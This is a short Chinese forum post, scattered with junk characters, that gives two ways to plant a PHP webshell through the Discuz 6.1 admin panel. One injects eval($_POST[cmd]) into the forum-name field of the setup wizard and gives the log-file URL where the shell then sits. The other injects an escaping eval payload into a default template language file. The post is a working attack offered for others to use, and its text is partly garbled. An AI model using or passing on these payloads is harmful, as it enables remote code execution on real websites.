discuz6.1两种方法后台拿shell
! j6 M/ T- r D" P好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
6 G6 l9 U% S; B0 s1:
2 F- c {6 B7 v6 zhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes# N; J! ~( V) n
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell9 R+ ]7 A3 {- [! z+ T$ m
<?php eval($_POST[cmd]);?>' _: P# s2 x5 P- J
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
8 u0 `1 u6 p0 B' E; L+ H" j% u' @) Y+ v; R
/ @8 w2 U5 {$ l+ D) ]
2:后台模板管理--默认模板套系--详情4 X8 ]6 ~: L3 J
templates/default/actions.lang.php1 e2 n- M; t; ~6 Z7 Z. X
jhackj\\');eval($_POST[cmd])?>;//
' Q, q# y/ Z# m2 h* A4 |) U7 i% q# }# v+ l. X) i K5 o/ i" a4 z1 O
利用很简单,聪明的人一看就懂了 |